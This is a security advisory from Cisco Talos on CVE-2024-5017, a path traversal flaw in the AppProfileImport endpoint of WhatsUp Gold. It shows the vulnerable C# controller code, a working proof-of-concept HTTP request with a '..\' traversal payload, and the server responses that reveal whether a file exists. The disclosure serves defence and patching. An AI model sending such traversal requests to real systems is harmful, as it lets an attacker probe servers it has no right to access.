Talos Vulnerability Report

TALOS-2024-1932

Progress Software Corporation WhatsUp Gold AppProfileImport path traversal vulnerability

June 26, 2024
CVE Number

CVE-2024-5017

SUMMARY

A path traversal vulnerability exists in the AppProfileImport functionality of Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697. A specially crafted HTTP request can lead to information disclosure. An attacker can make an authenticated HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Progress Software Corporation WhatsUp Gold 23.1.0 Build 1697

PRODUCT URLS

WhatsUp Gold - https://www.whatsupgold.com/

CVSSv3 SCORE

6.5 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

WhatsUp Gold is a network monitoring and management software developed by Progress. WhatsUp Gold is designed to provide visibility into IT infrastructure, allowing organizations to monitor the performance and health of networks, devices, servers, applications, and other critical components. It offers features such as network mapping, performance monitoring, alerting, and reporting to help IT professionals ensure the optimal functioning of their network infrastructure.

An authenticated user can upload a new Application profile definition file (xml) for monitoring triggering the following actions :

Settings - > Application monitoring - > Application and profile setup - > Application Profiles -> Import

Let us take a look at controler implementation responsible for handling this action:

Apm.UI\Apm\UI\Areas\APM\Controllers\Api\Applications\AppProfileImportController.cs

Line 1 	namespace Apm.UI.Areas.APM.Controllers.Api.Applications
Line 2 	{
Line 3 		public class AppProfileImportController : ApplicationControllerBase
Line 4 		{
Line 5 		
Line 6 		(...)
Line 7 		
Line 8 			public async Task<HttpResponseMessage> Post(string fileName, int uploadOption)
Line 9 			{	
Line 10				
Line 11				(...)
Line 12				
Line 13				if (uploadOption == 0 && File.Exists(getPath(fileName)))
Line 14				{
Line 15					return getResponse(new ResultModel
Line 16					{
Line 17						message = "FILE_EXISTS",
Line 18						success = false
Line 19					});
Line 20				}
Line 21			}			
Line 22			
Line 23			private string getPath(string fileName = null)
Line 24			{
Line 25				string text = HostingEnvironment.MapPath("~/Content/Apm/Import");
Line 26				if (!string.IsNullOrWhiteSpace(fileName))
Line 27				{
Line 28					return Path.Combine(text, fileName);
Line 29				}
Line 30				return text;
Line 31			}		

Apparent from the above is that the fileName argument is fully controlled by an attacker and is used in File.Exists function argument at line 15. We can also observe that there is no path traversal protection implemented inside getPath function line 22 and directly controlled fileName value is just combined with usage of Path.Combine function line 27. Such conditions allows the attacker to conduct path traversal attack and check an existence of any file within the file system.

Exploit Proof of Concept

An attacker needs to be authenticated and send the follwing request

REQ

POST /NmConsole/api/core/AppProfileImport?fileName=..\..\..\..\..\..\..\..\swapfile.sys&uploadOption=0 HTTP/1.1
Host: 192.168.0.252
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------25967750313659734821777115140
Content-Length: 37688
Origin: http://192.168.0.252
Connection: close
Referer: http://192.168.0.252/NmConsole/
Cookie: ASP.NET_SessionId=p5pzkxhx4kilqqvufzxf05se; langid=1033; .ASPXAUTH=A488824F3A736795051CAAE0DDDEE70583758077C846B3D8F8F706975CAC36BC398E5E9D4C0271BC05C2D70FD62F7CC774F6FE917C7F9862B7CEEE71B8557B3C125F06FD92F5C9FB8768C6DD2DD252A3072C5E021874340B90835928157EC9FE
Upgrade-Insecure-Requests: 1

-----------------------------25967750313659734821777115140
Content-Disposition: form-data; name="filefield-2438-button"; filename="Apache Web Server-Linux.xml"
Content-Type: text/xml

<?xml version="1.0"?>
<EntityAPMApplication xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <Name>Apache Server</Name>
  <Description>Monitors the health and performance of Apache Web Server on Linux. Specify non-standard port in the Attributes section below. Requires SNMP enabled on the Linux system hosting Apache Web Server and access to the Apache server-status web page.</Description>
  <ApplicationID>102</ApplicationID>
  <ApplicationType>
    <Name>Apache HTTP Server</Name>
    <Description>Apache</Description>
    <ApplicationTypeID>1009</ApplicationTypeID>
    <IconPath>apache.png</IconPath>
  </ApplicationType>
  (...)

-----------------------------25967750313659734821777115140--

RESP

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 12:09:28 GMT
Connection: close
Content-Length: 41

{"success":false,"message":"FILE_EXISTS"}

If checked file does not exist the server returns the following response:

RESP

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/xml; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
Set-Cookie: langid=1033; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-XSS-Protection: 1; mode=block
X-Powered-By: ASP.NET
Date: Fri, 26 Jan 2024 11:58:40 GMT
Connection: close
Content-Length: 56

<Error><Message>An error has occurred.</Message></Error>
TIMELINE

2024-02-07 - Initial Vendor Contact
2024-02-12 - Vendor Disclosure
2024-06-25 - Vendor Patch Release
2024-06-26 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.